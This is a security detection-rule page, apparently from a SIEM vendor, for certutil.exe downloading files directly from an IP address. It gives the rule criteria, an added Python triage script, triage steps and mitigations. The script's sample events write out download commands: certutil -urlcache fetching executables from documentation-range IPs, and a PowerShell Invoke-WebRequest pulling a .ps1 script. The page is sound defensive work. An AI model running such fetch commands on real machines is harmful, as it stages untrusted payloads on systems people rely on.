Suspicious File Downloaded From Direct IP Via Certutil.EXE
Rule name | Rule type | Log sources | MITRE ATT&CK tags | Severity
--- | --- | --- | --- | ---
Suspicious File Downloaded From Direct IP Via Certutil.EXE | Standard | Windows | Defense Evasion: Obfuscated Files or Information (T1027) | Critical
About the rule
Rule Type
Standard
Rule Description
Certutil.exe is a legitimate Windows utility used for certificate management, but threat actors frequently abuse it to download malicious payloads. This rule detects scenarios where certutil.exe is used to download files directly from an IP address instead of a domain—an indicator of potentially evasive behavior. Attackers favor IP-based URLs to avoid DNS-based detection and reputation checks. This technique is commonly observed in living-off-the-land attacks, where built-in tools like certutil are leveraged to bypass security controls and execute or stage further malicious payloads.
Severity
Trouble
Rule journey
Attack chain scenario
Initial access → Execution → Living-off-the-land binary (LOLBins) abuse → certutil.exe used to download file → Direct IP connection to avoid domain detection → File execution → Persistence or lateral movement
Impact
- Malware deployment
- Defense evasion
- Persistence
- Lateral movement
- Data exfiltration
Rule Requirement
Prerequisites
Using Windows Event Viewer:
To enable detailed process tracking in a domain environment, log in to a domain controller using domain admin credentials and open the Group Policy Management Console (GPMC). Create or edit a GPO linked to the target OU and navigate to the Advanced Audit Policy Configuration section to enable success auditing for both process creation and termination. To capture command-line details, enable the Include command line in process creation events setting under Audit Process Creation. Additionally, create the Microsoft-Windows-Security-Auditing/Operational registry key in the specified EventLog path to support enhanced auditing.
Using Sysmon:
To enable detailed process monitoring using Sysmon, first download and install it from Microsoft Sysinternals. Run Command Prompt as an administrator and install Sysmon with a configuration file that includes process creation tracking using sysmon.exe -i [configfile.xml]. Ensure your configuration includes a <ProcessCreate> filter to capture all process creation events. Additionally, create the Microsoft-Windows-Sysmon/Operational registry key under the EventLog path if it doesn’t already exist.
Criteria
Action1: actionname = "Process started" AND ((PROCESSNAME endswith "\certutil.exe" OR ORIGINALFILENAME = "CertUtil.exe") AND COMMANDLINE contains "urlcache ,verifyctl " AND COMMANDLINE contains "://1,://2,://3,://4,://5,://6,://7,://8,://9") AND COMMANDLINE notcontains "://7-" select Action1.HOSTNAME,Action1.MESSAGE,Action1.COMMANDLINE,Action1.FILE_NAME,Action1.PROCESSNAME,Action1.USERNAME,Action1.PARENTPROCESSNAME
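The criteria above, applied to process-creation events in Python as an added example (this is not the vendor's rule engine or the Sigma author's code). Field names follow Sysmon Event ID 1 (Image, OriginalFileName, CommandLine), the SIEM string matching is assumed to be case-insensitive, and every sample event is constructed for this example. The second function goes beyond the rule: it parses each URL and keeps only those whose host is a literal IP address, which shows where the "://1" to "://9" substring heuristic over- and under-matches.

```python
"""Added example: evaluate the certutil direct-IP download criteria against
process-creation events and compare the rule's substring heuristic with a
stricter IP-literal check. Sample events are constructed, not real telemetry."""
import ipaddress
import re
from urllib.parse import urlsplit

# Substring conditions taken from the rule's criteria. The SIEM query is
# assumed to be case-insensitive, so command lines are lower-cased first.
FLAGS = ("urlcache ", "verifyctl ")
DIGIT_URL_PREFIXES = tuple(f"://{d}" for d in range(1, 10))
SEVEN_ZIP_FILTER = "://7-"  # the rule's exclusion for hosts such as 7-zip.org

# Rough URL extractor for the stricter check: scheme, "://", then non-space text.
URL_RE = re.compile(r"[a-zA-Z][a-zA-Z0-9+.-]*://[^\s\"']+")


def matches_rule_criteria(event: dict) -> bool:
    """Faithful translation of the rule: certutil image or original file name,
    a urlcache/verifyctl switch, a URL whose host starts with a digit 1-9,
    and no '://7-' exclusion hit."""
    cmd = event.get("CommandLine", "").lower()
    is_certutil = (
        event.get("Image", "").lower().endswith("\\certutil.exe")
        or event.get("OriginalFileName", "").lower() == "certutil.exe"
    )
    has_download_switch = any(flag in cmd for flag in FLAGS)
    has_digit_host = any(prefix in cmd for prefix in DIGIT_URL_PREFIXES)
    return is_certutil and has_download_switch and has_digit_host and SEVEN_ZIP_FILTER not in cmd


def direct_ip_urls(command_line: str) -> list[str]:
    """Stricter check that goes beyond the rule: return only URLs whose host is
    a literal IPv4 or IPv6 address. This skips DNS names that merely begin with
    a digit and also catches bracketed IPv6 literals, which the '://1'..'://9'
    substrings never match."""
    hits = []
    for url in URL_RE.findall(command_line):
        host = urlsplit(url).hostname  # strips the port and IPv6 brackets
        if host is None:
            continue
        try:
            ipaddress.ip_address(host)
        except ValueError:
            continue  # a DNS name, not an IP literal
        hits.append(url)
    return hits


def triage(event: dict) -> dict:
    """Combine both checks so an analyst can see why an event fired (or did not)."""
    return {
        "rule_match": matches_rule_criteria(event),
        "ip_urls": direct_ip_urls(event.get("CommandLine", "")),
    }


CERTUTIL = r"C:\Windows\System32\certutil.exe"
SAMPLE_EVENTS = [  # constructed events; addresses are from documentation ranges
    {"Image": CERTUTIL, "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://192.0.2.10/update.exe C:\Users\Public\update.exe"},
    {"Image": CERTUTIL, "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil -urlcache -f https://7-zip.org/a/7z2301-x64.exe 7z.exe"},
    {"Image": CERTUTIL, "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil -verifyctl -f http://[2001:db8::5]/roots.stl roots.stl"},
    {"Image": CERTUTIL, "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil -urlcache -f https://1.example.com/tool.exe tool.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": "powershell -c Invoke-WebRequest http://198.51.100.7/a.ps1"},
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(triage(event), "<-", event["CommandLine"])
```

Running the script shows the two disagreements worth knowing about when tuning this rule: the fourth event (a DNS name beginning with a digit) satisfies the criteria but contains no IP literal, while the third event (a bracketed IPv6 literal) is a direct-IP download that the substring heuristic does not fire on. The stricter check is meant as a triage aid next to the rule, not as a replacement for it, since the rule's cheap substring matching is what makes it usable in real time.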
Detection
Execution Mode
realtime
Log Sources
Windows
MITRE ATT&CK
Defense Evasion: Obfuscated Files or Information (T1027)
Security standard:
Enabling this rule will help you meet the security standard's requirement listed below:
DE.CM-09: Computing hardware and software, runtime environments, and their data are monitored to find potentially adverse events
When this rule is triggered, you're notified of a file being downloaded directly from an IP address using certutil.exe—a dual-use tool often abused by attackers.
Author
Nasreddine Bencherchali (Nextron Systems)
Future actions
Known False Positives
This rule may be triggered by legitimate administrative or troubleshooting activities where certutil.exe is used to download files directly from an IP address, such as in air-gapped environments, script-based deployments, or isolated testing labs.
Next Steps
When this rule is triggered, the following measures can be implemented:
- Identification: Identify if the file download via certutil.exe from a direct IP is expected behavior. Check if the action originated from a user-initiated script or unknown process.
- Analysis: Trace the command line, parent process, and user account associated with the event. Inspect the downloaded file’s hash, analyze it in a sandbox, and determine whether it matches known malicious signatures.
- Response: Isolate the endpoint, terminate the process, and quarantine the downloaded file. Block the source IP at the firewall and initiate a full endpoint and network scan.
- Monitor certutil.exe: Restrict use of certutil.exe via application control policies.
Mitigation
Mitigation ID | Mitigation description
--- | ---
M1049 | Anti-virus can be used to automatically detect and quarantine suspicious files.
M1047 | Enable periodic review of common fileless storage locations such as the Registry or WMI repository.
M1040 | On Windows 10 and newer, enable Attack Surface Reduction (ASR) rules to prevent execution of potentially obfuscated payloads.
M1017 | Make sure that a software deployment system has only a limited number of entry points with restricted access for individuals.